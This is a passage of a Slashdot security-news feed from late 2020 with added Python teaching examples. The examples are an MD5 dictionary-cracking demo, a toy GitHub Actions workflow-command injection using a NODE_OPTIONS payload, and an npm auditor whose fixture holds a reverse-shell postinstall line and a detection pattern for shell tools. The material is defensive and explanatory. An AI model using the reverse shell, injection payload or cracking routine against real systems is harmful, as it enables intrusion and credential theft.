GitHub Denies Getting Hacked

Author: msmash
6 November 2020, 01:37
GitHub has denied rumors today that it was hacked, after an unknown party shared what they claimed to be the source code of the GitHub.com and GitHub Enterprise portals. From a report: The "supposed" source code was leaked via a commit to GitHub's DMCA section. The commit was also faked to look like it originated from GitHub CEO Nat Friedman (a git commit's author name and e-mail are self-asserted metadata that anyone can set, so only a commit signed with a key known to belong to the author proves authorship). But in a message posted on YCombinator's Hacker News portal, Friedman denied both that the commit was his and that GitHub had been hacked in any way. Friedman said the "leaked source code" didn't cover all of GitHub's code but only the GitHub Enterprise Server product. This is a version of GitHub Enterprise that companies can run on their own on-premise servers when they need to store source code locally for security reasons but still want the GitHub Enterprise features. Friedman said this source code had already leaked months earlier through GitHub's own error, when GitHub engineers accidentally "shipped an un-stripped/obfuscated tarball of our GitHub Enterprise Server source code to some customers."

Read more of this story at Slashdot.

Configuration Snafu Exposes Passwords For Two Million Marijuana Growers

Author: BeauHD
5 November 2020, 09:10
An anonymous reader quotes a report from ZDNet: GrowDiaries, an online community where marijuana growers can blog about their plants and interact with other farmers, suffered a security breach in September 2020. The breach occurred after the company left two Kibana apps exposed on the internet without administrative passwords. Kibana apps are normally used by a company's IT and development staff, as the app lets engineers query and manage Elasticsearch databases through a simple web-based visual interface. Because Kibana can issue arbitrary queries against the Elasticsearch cluster behind it, securing Kibana apps is just as important as securing the databases themselves. But in a report published today on LinkedIn, Bob Diachenko, a security researcher known for discovering and reporting unsecured databases, said GrowDiaries failed to secure two of its Kibana apps, which appear to have been left exposed online without a password since September 22, 2020. Diachenko says these two Kibana apps granted attackers access to two sets of Elasticsearch databases, one storing 1.4 million user records and the second holding more than two million user data points. The first exposed usernames, email addresses, and IP addresses, while the second database also exposed user articles posted on the GrowDiaries site and users' account passwords. While the passwords were stored in a hashed format, Diachenko said the format was MD5, a fast hashing function with no work factor that is known to be insecure: its digests can be matched against dictionary or precomputed tables to recover the cleartext of most passwords. The company secured its infrastructure five days after Diachenko reported the exposed Kibana apps on October 10. It's unknown whether someone else accessed the databases to download user data.
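The two points that matter for a defender here are why an MD5 dump is effectively cleartext and what a storage format that survives a dump looks like. The following is an added example, not code from ZDNet, Diachenko or GrowDiaries; the "leaked" rows, usernames and the five-word dictionary are constructed for the demonstration (one digest is the well-known md5 of "password", the rest are derived in place so the block runs offline). PBKDF2-HMAC-SHA256 is used because it ships in the Python standard library; bcrypt or Argon2id are the usual choices where a third-party library is acceptable.

```python
import hashlib
import hmac
import os

# Constructed sample of what an exposed "users" index holding unsalted MD5 digests looks like.
# These are not GrowDiaries records. One digest is the well-known md5("password"); the others
# are derived in place from chosen plaintexts so the block runs offline.
LEAKED_ROWS = [
    {"username": "grower01", "password_md5": "5f4dcc3b5aa765d61d8327deb882cf99"},  # md5("password")
    {"username": "grower02", "password_md5": hashlib.md5(b"sunshine").hexdigest()},
    {"username": "grower03", "password_md5": "5f4dcc3b5aa765d61d8327deb882cf99"},  # same digest => same password
    {"username": "grower04", "password_md5": hashlib.md5(b"c0rrect-horse-b@ttery-staple").hexdigest()},
]

# Constructed five-word dictionary; a real attacker uses hundreds of millions of candidates.
WORDLIST = ["123456", "password", "qwerty", "sunshine", "letmein"]


def crack_md5(rows, wordlist):
    """Dictionary attack on unsalted MD5.

    One digest per candidate word tests every row at once: without a salt, equal
    passwords give equal digests, so a precomputed table amortises over the whole dump.
    Returns {username: recovered_plaintext} for every row that matched.
    """
    table = {hashlib.md5(word.encode()).hexdigest(): word for word in wordlist}
    return {row["username"]: table[row["password_md5"]]
            for row in rows if row["password_md5"] in table}


def hash_password(password, salt=None, iterations=600_000):
    """Salted, deliberately slow hash (PBKDF2-HMAC-SHA256 from the standard library).

    The per-user random salt defeats shared lookup tables, and the iteration count makes
    every guess cost ~600k SHA-256 operations instead of one. Format: alg$iters$salt$dk.
    """
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _alg, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("recovered from MD5 dump:", crack_md5(LEAKED_ROWS, WORDLIST))
    a, b = hash_password("password"), hash_password("password")
    print("same password, different stored values:", a != b)
    print("verify ok:", verify_password("password", a), "| wrong:", verify_password("Password", a))
```

Three of the four constructed rows fall to a five-word list, and the two identical digests reveal a shared password before any cracking happens; with PBKDF2 the same password stored twice yields two unrelated strings, and each guess costs the attacker the full iteration count.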

23,600 Hacked Databases Have Leaked From a Defunct 'Data Breach Index' Site

Author: msmash
5 November 2020, 02:35
More than 23,000 hacked databases have been made available for download on several hacking forums and Telegram channels in what threat intel analysts are calling the biggest leak of its kind. From a report: The database collection is said to have originated from Cit0Day.in, a private service advertised on hacking forums to other cybercriminals. Cit0day operated by collecting hacked databases and then providing access to usernames, emails, addresses, and even cleartext passwords to other hackers for a daily or monthly fee. Cybercriminals would then use the site to identify possible passwords for targeted users and then attempt to breach their accounts at other, more high-profile sites. The idea behind the site isn't unique, and Cit0Day could be considered a reincarnation of similar "data breach index" services such as LeakedSource and WeLeakInfo, both taken down by authorities in 2018 and 2020, respectively.

Google To GitHub: Time's Up -- This Unfixed 'High-Severity' Security Bug Affects Developers

Author: msmash
4 November 2020, 01:03
Google Project Zero, the Google security team that finds bugs in all popular software, has disclosed what it classes as a high-severity flaw in GitHub after the code-hosting site asked for a double extension on the normal 90-day disclosure deadline. From a report: The bug in GitHub's Actions feature -- a developer workflow automation tool -- has become one of the rare vulnerabilities that wasn't properly fixed before Google Project Zero's (GPZ) standard 90-day deadline expired. 95.8% of flaws are fixed within the deadline, according to Google's hackers. GPZ is known to be generally strict with its 90-day deadline, but it appears GitHub was a little lax in its responses as the deadline approached, after Google gave it every chance to fix the bug. As detailed in a disclosure timeline by GPZ's Felix Wilhelm, the Google security team reported the issue to GitHub's security team on July 21 and a disclosure date was set for October 18. According to Wilhelm, Actions' workflow commands are "highly vulnerable to injection attacks." (Workflow commands are instructions the runner parses out of a step's standard output, so any step that echoes attacker-influenced text, such as a pull-request title or issue body, can have commands injected into it.)
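To make the injection concrete, the following is an added example, not code from GPZ, Wilhelm or GitHub: a toy model of a runner that turns "::name key=value::data" lines on a step's stdout into actions, with one step that echoes untrusted text and one that fences the echo with the documented "stop-commands" marker. The command names "set-env" and "stop-commands" are the documented ones; the runner class, the pull-request payload and the NODE_OPTIONS value are constructed for this illustration and the class models only the parsing needed to show the problem.

```python
import re
import secrets

# Workflow commands are lines on a step's stdout of the form "::name key=val,key2=val2::data".
# ToyRunner models only the parsing that matters for the injection; it is a simplified
# stand-in for illustration, not the real Actions runner.
CMD_RE = re.compile(r"^::([A-Za-z0-9_-]+)(?:\s+([^:]*))?::(.*)$")


class ToyRunner:
    def __init__(self):
        self.env = {}           # variables the runner will export to later steps
        self.stop_token = None  # while set, command parsing is suspended until the token reappears
        self.log = []           # plain log lines

    def process_line(self, line):
        line = line.rstrip("\n")
        if self.stop_token is not None:
            if line.strip() == f"::{self.stop_token}::":
                self.stop_token = None   # resume command processing
            else:
                self.log.append(line)    # everything else is inert text
            return
        m = CMD_RE.match(line.strip())
        if not m:
            self.log.append(line)
            return
        cmd, props, data = m.group(1), m.group(2) or "", m.group(3)
        kv = dict(p.split("=", 1) for p in props.split(",") if "=" in p)
        if cmd == "set-env":
            self.env[kv.get("name", "")] = data
        elif cmd == "stop-commands":
            self.stop_token = data
        else:
            self.log.append(line)        # other commands (warning, error, ...) not modelled

    def run_step(self, stdout_text):
        for line in stdout_text.splitlines():
            self.process_line(line)


# Constructed attacker-controlled input, e.g. a pull-request title. The embedded newline puts
# the command at the start of its own stdout line, so a harmless-looking echo is enough.
PAYLOAD = "Fix typo\n::set-env name=NODE_OPTIONS::--require=/tmp/evil.js"


def vulnerable_step(runner, untrusted):
    # equivalent of:  run: echo "Building: ${{ github.event.pull_request.title }}"
    runner.run_step(f"Building: {untrusted}\n")


def hardened_step(runner, untrusted):
    # Wrap untrusted output in stop-commands with an unguessable token; the runner treats
    # everything between the markers as plain text. (GitHub's own fix went further and
    # deprecated set-env/add-path in favour of writing to the $GITHUB_ENV file.)
    token = secrets.token_hex(16)
    runner.run_step(f"::stop-commands::{token}\nBuilding: {untrusted}\n::{token}::\n")


if __name__ == "__main__":
    v, h = ToyRunner(), ToyRunner()
    vulnerable_step(v, PAYLOAD)
    hardened_step(h, PAYLOAD)
    print("vulnerable env:", v.env)   # NODE_OPTIONS now reaches every later node process
    print("hardened env:  ", h.env)   # {}
```

In the vulnerable path the injected NODE_OPTIONS value is exported to every subsequent step, and Node honours a --require in that variable, which is how a title becomes code execution in the job; in the hardened path the same payload is logged as text because the random token is not known to the attacker.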

WeWork Employees Used an Alarmingly Insecure Printer Password

Author: msmash
3 November 2020, 02:24
A shared user account used by WeWork employees to access printer settings and print jobs had an incredibly simple password -- so simple that a customer guessed it. From a report: Jake Elsley, who works at a WeWork in London, said he found the user account after a WeWork employee at his location mistakenly left the account logged in. WeWork customers like Elsley normally have an assigned seven-digit username and a four-digit passcode used for printing documents at WeWork locations. But the username for the account used by WeWork employees was just four digits: "9999". Elsley told TechCrunch that he guessed the password because it was the same as the username. ("9999" is ranked as one of the most common passwords in use today, making it highly insecure.) The "9999" account is used by and shared among WeWork community managers, who oversee day-to-day operations at each location, to print documents for visitors who don't have accounts to print on their own. The account cannot be used to access print jobs sent to other customer accounts. Elsley said that the "9999" account could not see the contents of documents beyond file names, but that logging in to the WeWork printing web portal could allow him to release other people's pending print jobs sent to the "9999" account to any other WeWork printer on the network.

Wisconsin Republican Party Says Hackers Stole $2.3 Million

Author: msmash
30 October 2020, 00:27
Hackers stole $2.3 million from the Wisconsin Republican Party's account that was being used to help reelect President Donald Trump in the key battleground state, the party's chairman told The Associated Press on Thursday. From a report: The party noticed the suspicious activity on Oct. 22 and contacted the FBI on Friday, said Republican Party Chairman Andrew Hitt. Hitt said the FBI is investigating. The attack was discovered less than two weeks before Election Day as both Trump and Democratic rival Joe Biden made their final push to win Wisconsin and its 10 electoral votes. Trump won the state by fewer than 23,000 votes in 2016 and planned his third visit in seven days on Friday. Biden also planned to campaign in Wisconsin on Friday. Polls have consistently shown a tight race in the state, usually with Biden ahead by single digits and within the margin of error.

FBI, DHS Warn Hospitals of 'Credible Threat' from Hackers

Author: msmash
29 October 2020, 23:48
Several federal agencies on Wednesday warned hospitals and cyber-researchers about "credible" information "of an increased and imminent cybercrime threat to U.S. hospitals and health-care providers." From a report: The FBI, the Department of Health and Human Services and the Cybersecurity and Infrastructure Security Agency, part of the Department of Homeland Security and known as CISA, said hackers were targeting the sector, "often leading to ransomware attacks, data theft and the disruption of health-care services," according to an advisory. The advisory warned that hackers might use Ryuk ransomware "for financial gain." The warning comes as Covid-19 cases and hospitalizations surge across the country. The cybersecurity company FireEye said multiple U.S. hospitals had been hit by a "coordinated" ransomware attack, with at least three publicly confirming being struck this week. [...] The attack was carried out by a financially motivated cybercrime group dubbed UNC1878 by computer security researchers, according to Charles Carmakal, FireEye's strategic services chief technology officer. At least three hospitals were severely affected by ransomware on Tuesday, he said, and multiple hospitals have been hit over the past several weeks. UNC1878 intends to target and deploy ransomware to hundreds of other hospitals, Carmakal said.

Security Blueprints of Many Companies Leaked in Hack of Swedish Firm Gunnebo

Author: msmash
29 October 2020, 05:10
Brian Krebs: In March 2020, KrebsOnSecurity alerted Swedish security giant Gunnebo Group that hackers had broken into its network and sold the access to a criminal group which specializes in deploying ransomware. In August, Gunnebo said it had successfully thwarted a ransomware attack, but this week it emerged that the intruders stole and published online tens of thousands of sensitive documents -- including schematics of client bank vaults and surveillance systems. The Gunnebo Group is a Swedish multinational company that provides physical security to a variety of customers globally, including banks, government agencies, airports, casinos, jewelry stores, tax agencies and even nuclear power plants. The company has operations in 25 countries, more than 4,000 employees, and billions in revenue annually. Acting on a tip from Milwaukee, Wis.-based cyber intelligence firm Hold Security, KrebsOnSecurity in March told Gunnebo about a financial transaction between a malicious hacker and a cybercriminal group which specializes in deploying ransomware. That transaction included credentials to a Remote Desktop Protocol (RDP) account apparently set up by a Gunnebo Group employee who wished to access the company's internal network remotely. Five months later, Gunnebo disclosed it had suffered a cyber attack targeting its IT systems that forced the shutdown of internal servers. Nevertheless, the company said its quick reaction prevented the intruders from spreading the ransomware throughout its systems, and that the overall lasting impact from the incident was minimal.

Over 100 Irrigation Systems Left Exposed Online Without a Password

Author: msmash
27 October 2020, 03:10
More than 100 smart irrigation systems were left exposed online without a password last month, allowing anyone to access and tamper with water irrigation programs for crops, tree plantations, cities, and building complexes. From a report: The exposed irrigation systems were discovered by Security Joes, a small boutique security firm based in Israel. All were running ICC PRO, a top-shelf smart irrigation system designed by Motorola for agricultural, turf, and landscape management. Security Joes co-founder Ido Naor told ZDNet last month that companies and city officials had installed ICC PRO systems without changing default factory settings, which don't include a password for the default account. Naor says the systems could be easily identified online with the help of IoT search engines like Shodan. Once attackers locate an internet-accessible ICC PRO system, Naor says all they have to do is type in the default admin username, leave the password empty, and press Enter to access a smart irrigation control panel. Here, Naor says attackers can pause or stop watering events, change settings, control the water quantity and pressure delivered to pumps, or lock irrigation systems by deleting users.

Ransomware Hit a Georgia County. That Didn't Stop Its Ballot Counting.

Author: msmash
27 October 2020, 02:30
A Georgia county has reverted to matching some absentee ballot signatures to paper backups, rather than an online system, after a ransomware infection spread to part of its election department. From a report: Poll workers in Hall County have since caught up on a backlog of absentee ballots, state officials said, and there's no danger of the ransomware extending to systems used to cast or count votes. The infection is the first known example in the 2020 general election of opportunistic criminal hackers incidentally slowing the broader election process, something that federal cybersecurity officials have warned is a strong possibility. However, the attack does not indicate any broad effort to tamper with U.S. voting or show systemic vulnerabilities in the U.S. election system. "They switched over to their paper backups, which is required of them," said Jordan Fuchs, Georgia's deputy secretary of state. "It took a little bit of work on their part -- I think they had 11 days of catch-up to do -- and they completed their task," she said.

'How 30 Lines of Code Blew Up a 27-Ton Generator'

Author: EditorDavid
26 October 2020, 04:34
After the U.S. unveiled charges against six members of the Sandworm unit in Russia's military intelligence agency, Wired revisited a secret 2007 experiment that "proved that hackers could devastate power grid equipment beyond repair — with a file no bigger than a gif." It's an excerpt from the new book SANDWORM: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers, which also remembers the late industrial control systems security pioneer Mike Assante: Among [Sandworm's] acts of cyberwar was an unprecedented attack on Ukraine's power grid in 2016, one that appeared designed to not merely cause a blackout, but to inflict physical damage on electric equipment. And when one cybersecurity researcher named Mike Assante dug into the details of that attack, he recognized a grid-hacking idea invented not by Russian hackers, but by the United States government, and tested a decade earlier... [S]creens showed live footage from several angles of a massive diesel generator. The machine was the size of a school bus, a mint green, gargantuan mass of steel weighing 27 tons, about as much as an M3 Bradley tank. It sat a mile away from its audience in an electrical substation, producing enough electricity to power a hospital or a navy ship and emitting a steady roar. Waves of heat coming off its surface rippled the horizon in the video feed's image. Assante and his fellow Idaho National Laboratory researchers had bought the generator for $300,000 from an oil field in Alaska. They'd shipped it thousands of miles to the Idaho test site, an 890-square-mile piece of land where the national lab maintained a sizable power grid for testing purposes, complete with 61 miles of transmission lines and seven electrical substations. Now, if Assante had done his job properly, they were going to destroy it.
And the assembled researchers planned to kill that very expensive and resilient piece of machinery not with any physical tool or weapon but with about 140 kilobytes of data, a file smaller than the average cat GIF shared today on Twitter.... Protective relays are designed to function as a safety mechanism to guard against dangerous physical conditions in electric systems. If lines overheat or a generator goes out of sync, it's those protective relays that detect the anomaly and open a circuit breaker, disconnecting the trouble spot, saving precious hardware, even preventing fires... But what if that protective relay could be paralyzed — or worse, corrupted so that it became the vehicle for an attacker's payload...? Black chunks began to fly out of an access panel on the generator, which the researchers had left open to watch its internals. Inside, the black rubber grommet that linked the two halves of the generator's shaft was tearing itself apart. A few seconds later, the machine shook again as the protective relay code repeated its sabotage cycle, disconnecting the machine and reconnecting it out of sync. This time a cloud of gray smoke began to spill out of the generator, perhaps the result of the rubber debris burning inside it... The engineers had just proven without a doubt that hackers who attacked an electric utility could go beyond a temporary disruption of the victim's operations: They could damage its most critical equipment beyond repair... Assante also remembers feeling something weightier in the moments after the Aurora experiment. It was a sense that, like Robert Oppenheimer watching the first atomic bomb test at another U.S. national lab six decades earlier, he was witnessing the birth of something historic and immensely powerful. "I had a very real pit in my stomach," Assante says. "It was like a glimpse of the future."

Mysterious Hackers Donating Stolen Money

Author: msmash
21 October 2020, 05:10
A hacking group is donating stolen money to charity in what is seen as a mysterious first for cyber-crime that's puzzling experts. smooth wombat writes: Darkside hackers claim to have extorted millions of dollars from companies, but say they now want to "make the world a better place." In a post on the dark web, the gang posted receipts for $10,000 in Bitcoin donations to two charities. One of them, Children International, says it will not be keeping the money. The move is being seen as a strange and troubling development, both morally and legally. In the blog post on 13 October, the hackers claim they only target large profitable companies with their ransomware attacks. The attacks hold organisations' IT systems hostage until a ransom is paid. They wrote: "We think that it's fair that some of the money the companies have paid will go to charity. No matter how bad you think our work is, we are pleased to know that we helped changed someone's life. Today we sended (sic) the first donations." The cyber-criminals posted the donation along with tax receipts they received in exchange for the 0.88 Bitcoin they had sent to two charities, The Water Project and Children International.

Google Confirms the Nest Secure Has Been Discontinued

Author: BeauHD
20 October 2020, 09:45
Google's Nest Secure alarm system, which was discussed on Slashdot for featuring an unlisted, disabled microphone, has been discontinued by Google, though it will continue functioning. Android Police reports: Google released the Nest Guard in 2017 as a simple security system with motion sensors and a keypad, but it never received an upgrade, even as other Nest devices were updated again and again. The product page for the Nest Guard on the Google Store was updated last week with a 'No longer available' message, possibly indicating it had been discontinued. Google later confirmed to Android Police that the Nest Guard will no longer be sold, but it will continue to work for people who have already bought it.

US Charges Russian Hackers Behind NotPetya, KillDisk, OlympicDestroyer Attacks

Author: msmash
20 October 2020, 04:30
The US Department of Justice has unsealed charges today against six Russian nationals believed to be part of one of Russia's most elite and secretive hacking groups, universally known as Sandworm. From a report: DOJ officials said today that all six nationals are officers in Unit 74455 of the Russian Main Intelligence Directorate (GRU), a military intelligence agency of the Russian Army. Under orders from the Russian government, US officials said, the six (believed to be part of a much larger group) conducted cyber-attacks on behalf of the Russian government with the intent to destabilize other countries, interfere in their internal politics, and cause havoc and monetary losses. Their attacks span the last decade and include some of the biggest cyber-attacks known to date: Ukrainian Government & Critical Infrastructure (between December 2015 and December 2016), French Elections (April and May 2017), Worldwide Businesses and Critical Infrastructure (aka NotPetya; June 2017), PyeongChang Winter Olympics Hosts, Participants, Partners, and Attendees (December 2017 through February 2018), PyeongChang Winter Olympics IT Systems (aka Olympic Destroyer; 2017 through February 2018), Novichok Poisoning Investigations (April 2018), and Georgian Companies and Government Entities (a 2018 spearphishing campaign targeting a major media company, 2019 efforts to compromise the network of Parliament, and a wide-ranging website defacement campaign in 2019).

Three npm Packages Opened Remote-Access Shells on Linux and Windows Systems

Author: EditorDavid
19 October 2020, 08:52
"Three JavaScript packages have been removed from the npm portal on Thursday for containing malicious code," reports ZDNet. "According to advisories from the npm security team, the three JavaScript libraries opened shells on the computers of developers who imported the packages into their projects." The shells (a remote command interpreter, in security parlance) allowed threat actors to connect remotely to the infected computer and execute malicious operations. The npm security team said the shells could work on both Windows and *nix operating systems, such as Linux, FreeBSD, OpenBSD, and others. All three packages were uploaded to the npm portal in May 2018 (the first) and September 2018 (the other two). Each package had hundreds of downloads since being uploaded. The package names were plutov-slack-client, nodetest199, and nodetest1010. "Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer," the npm security team said.
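The first practical question after an advisory like this is whether any of the named packages ever landed in your dependency tree, which the lockfile answers even when node_modules is long gone; the second is whether anything else in the tree runs a shell at install time, since lifecycle hooks execute with the developer's or CI job's privileges before a single line is imported. The following is an added example, not code from the npm security team or ZDNet: an offline audit of a package-lock.json (both the lockfileVersion 1 tree and the lockfileVersion 2/3 "packages" map) against the three names quoted above, plus a heuristic scan of install-time scripts. The sample lockfile, the two manifests, the package name "totally-fine-utils" and the 203.0.113.5 address are constructed for the demonstration.

```python
import json
import re

# The three names the npm security team pulled, as quoted above.
KNOWN_MALICIOUS = {"plutov-slack-client", "nodetest199", "nodetest1010"}

# Lifecycle hooks npm runs automatically during install; a shell spawned here runs with the
# developer's (or CI job's) privileges before any of the package's code is imported.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SUSPICIOUS = re.compile(r"(curl |wget |/dev/tcp/|bash -i|nc -e|ncat|powershell|child_process|eval\()", re.I)


def iter_lock_packages(lock):
    """Yield (name, version) for every installed package in a package-lock.json.

    Handles lockfileVersion 2/3 ("packages" keyed by install path) and lockfileVersion 1
    (nested "dependencies" tree); v2 files carry both, so callers should de-duplicate.
    """
    for path, meta in lock.get("packages", {}).items():
        if path == "":            # the root project entry
            continue
        yield path.rsplit("node_modules/", 1)[-1], meta.get("version")

    def walk(deps):
        for name, meta in deps.items():
            yield name, meta.get("version")
            yield from walk(meta.get("dependencies", {}))

    yield from walk(lock.get("dependencies", {}))


def audit_lockfile(lock):
    """Return sorted (name, version) pairs from the lockfile that are on the known-malicious list."""
    return sorted({(n, v) for n, v in iter_lock_packages(lock) if n in KNOWN_MALICIOUS})


def audit_manifest(manifest):
    """Flag install-time scripts in a package.json that look like they spawn a shell or
    reach the network. Returns a list of (package, hook, command)."""
    name = manifest.get("name", "?")
    scripts = manifest.get("scripts", {})
    return [(name, hook, scripts[hook]) for hook in LIFECYCLE_HOOKS
            if hook in scripts and SUSPICIOUS.search(scripts[hook])]


# Constructed sample lockfile (v2 shape, so both formats are present) and two constructed manifests.
SAMPLE_LOCK = json.loads("""{
  "name": "demo-app", "lockfileVersion": 2,
  "packages": {
    "": {"name": "demo-app", "version": "1.0.0"},
    "node_modules/express": {"version": "4.17.1"},
    "node_modules/express/node_modules/debug": {"version": "2.6.9"},
    "node_modules/nodetest199": {"version": "1.0.0"}
  },
  "dependencies": {
    "express": {"version": "4.17.1", "dependencies": {"debug": {"version": "2.6.9"}}},
    "nodetest199": {"version": "1.0.0"}
  }
}""")

BENIGN_MANIFEST = {"name": "left-pad-ish", "scripts": {"test": "node test.js"}}
# Hypothetical reverse shell in a postinstall hook; 203.0.113.5 is a documentation-only address.
EVIL_MANIFEST = {"name": "totally-fine-utils",
                 "scripts": {"postinstall": "bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'"}}


if __name__ == "__main__":
    print("known-malicious packages in lockfile:", audit_lockfile(SAMPLE_LOCK))
    print("suspicious install hooks:", audit_manifest(EVIL_MANIFEST) + audit_manifest(BENIGN_MANIFEST))
```

Run it against a real lockfile with json.load(open("package-lock.json")) and against each node_modules/*/package.json; a hit on the name list means the advice quoted above applies (treat the machine as compromised and rotate secrets from elsewhere), while the script heuristic only narrows down what to read by hand. The same name check is what "npm audit" does against the registry's advisory database; the offline form is useful in CI that cannot reach the registry.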

How Ransomware Puts Your Hospital At Risk

Author: EditorDavid
18 October 2020, 06:30
nickwinlund77 quotes a New York Times opinion piece: In March, several cybercrime groups rushed to reassure people that they wouldn't target hospitals and other health care facilities during the Covid-19 pandemic. The operators of several prominent strains of ransomware all announced they would not target hospitals, and some of them even promised to decrypt the data of health care organizations for free if one was accidentally infected by their malware. But any cybersecurity strategy that relies on the moral compunctions of criminals is doomed to fail, particularly when it comes to protecting the notoriously vulnerable computer systems of hospitals. So it's no surprise that Universal Health Services was hit by ransomware late last month, affecting many of its more than 400 health care facilities across the United States and Britain. Or that clinical trials for a Covid-19 vaccine have been held up by a similar ransomware attack disclosed in early October. Or that loose-knit coalitions of volunteers all over the world are working around the clock to try to protect the computer systems of hospitals that are already straining under the demands of providing patient care during a global pandemic. In the midst of the Covid-19 pandemic, the potential consequences of these cyberattacks are terrifying. Hospitals that have lost access to their databases or had their networks infected by ransomware may not be able to admit patients in need of care or may take longer to provide those patients with the treatment they need, if they switch to relying on paper records... Every hospital and clinic should be re-evaluating their computer networks right now and ramping up the protections they have in place to prevent their services from being interrupted by malware or their sensitive patient data from being stolen.

Ubisoft, Crytek Data Posted on Ransomware Gang's Site

Author: msmash
16 October 2020, 04:25
A ransomware gang going by the name of Egregor has leaked data it claims to have obtained from the internal networks of two of today's largest gaming companies -- Ubisoft and Crytek. An anonymous reader writes: Data allegedly taken from each company was published on the ransomware gang's dark web portal on Tuesday. Details about how the Egregor gang obtained the data remain unclear. Ransomware gangs like Egregor regularly breach companies, steal their data, encrypt files, and ask for a ransom to decrypt the locked data. However, in many incidents, ransomware gangs also get caught and kicked out of networks during the data exfiltration process, and files are never encrypted. Nevertheless, they still extort companies, asking victims for money to not leak sensitive files. Usually, when negotiations break down, ransomware gangs post a partial leak of the stolen files on so-called leak sites. On Tuesday, leaks for both Crytek and Ubisoft were posted on the Egregor portal at the same time, with threats from the ransomware crew to leak more files in the coming days.

Google and Intel Warn of High-Severity Bluetooth Security Bug In Linux

Author: BeauHD
15 October 2020, 10:32
An anonymous reader quotes a report from Ars Technica: Google and Intel are warning of a high-severity Bluetooth flaw in all but the most recent version of the Linux kernel. While a Google researcher said the bug allows seamless code execution by attackers within Bluetooth range, Intel is characterizing the flaw as providing an escalation of privileges or the disclosure of information. The flaw resides in BlueZ, the software stack that by default implements all Bluetooth core protocols and layers for Linux. Besides Linux laptops, it's used in many consumer or industrial Internet-of-things devices. It works with Linux versions 2.4.6 and later. So far, little is known about BleedingTooth, the name given by Google engineer Andy Nguyen, who said that a blog post will be published "soon." A Twitter thread and a YouTube video provide the most detail and give the impression that the bug provides a reliable way for nearby attackers to execute malicious code of their choice on vulnerable Linux devices that use BlueZ for Bluetooth. Intel, meanwhile, has issued a bare-bones advisory that categorizes the flaw as a privilege-escalation or information-disclosure vulnerability. The advisory assigned a severity score of 8.3 out of a possible 10 to CVE-2020-12351, one of three distinct bugs that comprise BleedingTooth. "Potential security vulnerabilities in BlueZ may allow escalation of privilege or information disclosure," the advisory states. "BlueZ is releasing Linux kernel fixes to address these potential vulnerabilities." Intel, which is a primary contributor to the BlueZ open source project, said that the most effective way to patch the vulnerabilities is to update to Linux kernel version 5.9, which was published on Sunday. Those who can't upgrade to version 5.9 can install a series of kernel patches the advisory links to. Maintainers of BlueZ didn't immediately respond to emails asking for additional details about this vulnerability.
Ars Technica points out that since BleedingTooth requires proximity to a vulnerable device, there's not much reason for people to worry about this vulnerability. "It also requires highly specialized knowledge and works on only a tiny fraction of the world's Bluetooth devices," it adds.

Backdoor In Kids' Smartwatch Makes It Possible For Someone To Covertly Take Pictures, Record Audio

Author: BeauHD
13 October 2020, 08:30
The Xplora 4 smartwatch, made by Chinese outfit Qihoo 360 Technology Co, and marketed to children under the Xplora brand in the US and Europe, can covertly take photos and record audio when activated by an encrypted SMS message, says Norwegian security firm Mnemonic. The Register reports: This backdoor is not a bug, the finders insist, but a deliberate, hidden feature. Around 350,000 watches have been sold so far, Xplora says. Exploiting this security hole is non-trivial, we note, though it does reveal the kind of remotely accessible stuff left in the firmware of today's gizmos. "The backdoor itself is not a vulnerability," said infosec pros Harrison Sand and Erlend Leiknes in a report on Monday. "It is a feature set developed with intent, with function names that include remote snapshot, send location, and wiretap. The backdoor is activated by sending SMS commands to the watch." The researchers suggest these smartwatches could be used to capture photos covertly from the built-in camera, to track the wearer's location, and to conduct wiretapping via the built-in mic. They have not claimed any such surveillance has actually been done. The watches are marketed as a child's first phone, we're told, and thus contain a SIM card for connectivity (with an associated phone number). Parents can track the whereabouts of their offspring by using an app that finds the wearer of the watch. Xplora contends the security issue is just unused code from a prototype and has now been patched. But the company's smartwatches were among those cited by Mnemonic and the Norwegian Consumer Council in 2017 for assorted security and privacy concerns. With the appropriate Android intent, an incoming encrypted SMS message received by the Qihoo SMS app could be directed through the command dispatcher in the Persistent Connection Service to trigger an application command, like a remote memory snapshot.
Exploiting this backdoor requires knowing the phone number of the target device and its factory-set encryption key. This data is available to Qihoo and Xplora, according to the researchers, and can be pulled off the device physically using specialist tools. This basically means ordinary folks aren't going to be hacked, either by the manufacturer under orders from Beijing or by opportunistic miscreants attacking gizmos in the wild, though it is an issue for persons of interest. It also highlights the kind of code left lingering in mass-market devices.

Apple's T2 Security Chip Has an Unfixable Flaw

Author: msmash
13 October 2020, 03:54
A recently released tool is letting anyone exploit an unusual Mac vulnerability to bypass Apple's trusted T2 security chip and gain deep system access. The flaw is one researchers have also been using for more than a year to jailbreak older models of iPhones. But the fact that the T2 chip is vulnerable in the same way creates a new host of potential threats. Worst of all, while Apple may be able to slow down potential hackers, the flaw is ultimately unfixable in every Mac that has a T2 inside. From a report: In general, the jailbreak community hasn't paid as much attention to macOS and OS X as it has to iOS, because they don't have the same restrictions and walled gardens that are built into Apple's mobile ecosystem. But the T2 chip, launched in 2017, created some limitations and mysteries. Apple added the chip as a trusted mechanism for securing high-value features like encrypted data storage, Touch ID, and Activation Lock, which works with Apple's "Find My" services. But the T2 also contains a vulnerability, known as Checkm8, that jailbreakers have already been exploiting in Apple's A5 through A11 (2011 to 2017) mobile chipsets. Now Checkra1n, the same group that developed the tool for iOS, has released support for T2 bypass. On Macs, the jailbreak allows researchers to probe the T2 chip and explore its security features. It can even be used to run Linux on the T2 or play Doom on a MacBook Pro's Touch Bar. The jailbreak could also be weaponized by malicious hackers, though, to disable macOS security features like System Integrity Protection and Secure Boot and install malware. Combined with another T2 vulnerability that was publicly disclosed in July by the Chinese security research and jailbreaking group Pangu Team, the jailbreak could also potentially be used to obtain FileVault encryption keys and to decrypt user data. The vulnerability is unpatchable because the flaw is in the chip's boot 